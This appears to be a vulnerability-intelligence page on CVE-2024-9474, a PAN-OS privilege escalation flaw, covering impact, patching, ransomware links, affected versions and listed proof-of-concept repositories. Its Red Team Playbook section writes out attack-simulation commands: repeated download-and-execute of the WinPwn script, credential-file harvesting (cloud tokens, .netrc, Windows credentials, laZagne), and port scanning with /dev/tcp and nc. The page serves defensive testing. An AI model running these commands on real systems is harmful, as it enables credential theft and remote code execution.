CVE-2024-9474
Overview
This vulnerability is a privilege escalation flaw rooted in improper access control within the Palo Alto Networks PAN-OS management web interface. Specifically, authenticated administrators can exploit command injection vectors in web interface endpoints to execute system commands with root privileges. The affected component is the PAN-OS management web interface responsible for firewall administration.
Vulnerability Description
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Impact
An authenticated PAN-OS administrator with access to the management web interface can escalate privileges to root, enabling arbitrary command execution on the firewall. This allows full system control, including bypassing security controls and potentially compromising the entire firewall infrastructure. The prerequisite is valid administrator-level credentials with web interface access, which could lead to complete system compromise and disruption of firewall operations.
Solution
Palo Alto Networks has released a security advisory detailing patches for affected PAN-OS versions; administrators should apply the updates as outlined in the vendor advisory at https://security.paloaltonetworks.com/CVE-2024-9474. The advisory provides specific patched versions and recommended upgrade procedures. Organizations should follow these instructions promptly to remediate the vulnerability in PAN-OS management interfaces.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A privilege escalation vulnerability has been identified in Palo Alto Networks PAN-OS software, which poses significant risks to organizations relying on this firewall management solution. This flaw allows an administrator with access to the management web interface to execute actions with root privileges. The implications of this vulnerability are profound, as it undermines the fundamental security model of least privilege, potentially enabling unauthorized access to sensitive configurations and data. The affected versions include multiple iterations of PAN-OS, specifically those leading up to the latest releases, which indicates a broad attack surface for potential exploitation.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with administrative access to the management interface can leverage this flaw to escalate privileges, effectively gaining root-level control over the firewall. This could involve manipulating firewall rules, accessing sensitive logs, or even disabling security features, thereby compromising the integrity of the entire network. Scenarios may include an insider threat, where a malicious administrator exploits their access, or an external attacker who has gained administrative credentials through phishing or other means. The ease of exploitation, combined with the critical nature of the affected product, makes this vulnerability particularly concerning for organizations.
The real-world impact of this vulnerability is substantial. Organizations utilizing PAN-OS for their firewall management may face severe business risks, including data breaches, service disruptions, and regulatory non-compliance. The ability to manipulate firewall settings can lead to unauthorized access to internal resources, exposing sensitive information and potentially resulting in financial losses or reputational damage. Furthermore, the exploitation of this vulnerability could facilitate lateral movement within a network, allowing attackers to pivot to other critical systems and escalate their attack further. The potential for widespread damage underscores the importance of addressing this vulnerability promptly.
Detection and mitigation strategies are essential for organizations to safeguard their environments against this vulnerability. Regular audits of user access levels and administrative privileges can help identify and remediate excessive permissions. Implementing multi-factor authentication for administrative access can further reduce the risk of unauthorized exploitation. Additionally, organizations should maintain an up-to-date inventory of their PAN-OS versions and apply patches or updates as soon as they become available. Continuous monitoring of firewall logs for unusual activity can also aid in early detection of potential exploitation attempts, allowing for swift incident response.
In summary, the privilege escalation vulnerability in PAN-OS represents a critical threat to organizations that rely on this software for firewall management. The ability for an administrator to gain root privileges can lead to severe consequences, including unauthorized access and manipulation of network security settings. Organizations must prioritize detection and mitigation strategies to protect against this vulnerability, ensuring that their network defenses remain robust and resilient against potential exploitation. By taking proactive measures, businesses can significantly reduce their risk exposure and maintain the integrity of their cybersecurity posture.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-9474, reflected in a modest uptick in telemetry signals. This subtle rise coincides with the continued availability and dissemination of multiple proof-of-concept exploits on public platforms, which lowers the barrier for adversaries to attempt exploitation. Although the overall exploit trend remains stable without rapid escalation, the presence of known ransomware groups such as akira, ransomhub, sinobi, and 0apt linked to campaigns leveraging this vulnerability underscores its ongoing operational relevance. The inclusion of CVE-2024-9474 in the KEV catalog with a confirmed ransomware use case further validates its threat potential. Consequently, while the risk level remains high, defenders should recognize that the vulnerability continues to be actively targeted, warranting sustained vigilance. The combination of increased exploit availability and ransomware group interest suggests that exploitation attempts may become more frequent, reinforcing the criticality of monitoring and detection efforts.
Update 2 — July 03, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-9474, indicating increased adversary engagement with this privilege escalation vulnerability. This uptick coincides with the continued availability of multiple proof-of-concept exploits on public repositories, which lowers the barrier for threat actors to weaponize the flaw. Although the EPSS score remains stable, the qualitative increase in telemetry signals a growing operational interest, particularly among ransomware groups such as akira, ransomhub, sinobi, frag, and 0apt, which have been linked to campaigns leveraging this vulnerability. This development underscores the persistence of CVE-2024-9474 as a viable attack vector within the threat landscape. For defenders, the significance lies in the heightened likelihood of exploitation attempts against PAN-OS management interfaces, reinforcing the need for sustained monitoring and rapid detection capabilities. Consequently, the threat level associated with this vulnerability should be considered elevated, reflecting its active targeting and the expanding toolkit available to adversaries.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.12 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.12 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.12:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 11.0.6 |
cpe:2.3:o:paloaltonetworks:pan-os:11.0.6:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 11.1.5 |
cpe:2.3:o:paloaltonetworks:pan-os:11.1.5:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 11.2.4 |
cpe:2.3:o:paloaltonetworks:pan-os:11.2.4:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Palo Alto Networks PAN-OS Management Interface Unauthenticated Remote Code Execution
exploits/linux/http/panos_management_unauth_rce
|
watchTowr, sfewer-r7 | Unknown | linux, unix | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2024-9474
PAN-OS auth bypass + RCE
|
Chocapikk | 45 | 17 | 2024-11-19 | View |
|
k4nfr3/CVE-2024-9474
|
k4nfr3 | 9 | 2 | 2024-11-19 | View |
|
coskper-papa/PAN-OS_CVE-2024-9474
Palo Alto Networks PAN-OS(CVE-2024-9474) POC
|
coskper-papa | 2 | 0 | 2024-12-11 | View |
|
aratane/CVE-2024-9474
Palo Alto RCE Vuln
|
aratane | 1 | 0 | 2025-01-16 | View |
|
deathvu/CVE-2024-9474
PoC for PAN-OS Exploit
|
deathvu | 0 | 0 | 2024-11-20 | View |
Threat Feed
27 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-6 | Argument Injection |
40%
|
High | High | |
| CAPEC-88 | OS Command Injection |
40%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9474 |
| security.paloaltonetworks.com |
GitHub CVE
vendor-advisory
|
https://security.paloaltonetworks.com/CVE-2024-9474 |
| unit42.paloaltonetworks.com |
NVD API
Press/Media Coverage
Vendor Advisory
|
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ |
| github.com |
NVD API
Exploit
|
https://github.com/k4nfr3/CVE-2024-9474 |
| labs.watchtowr.com |
NVD API
Exploit
Third Party Advisory
|
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-9474 |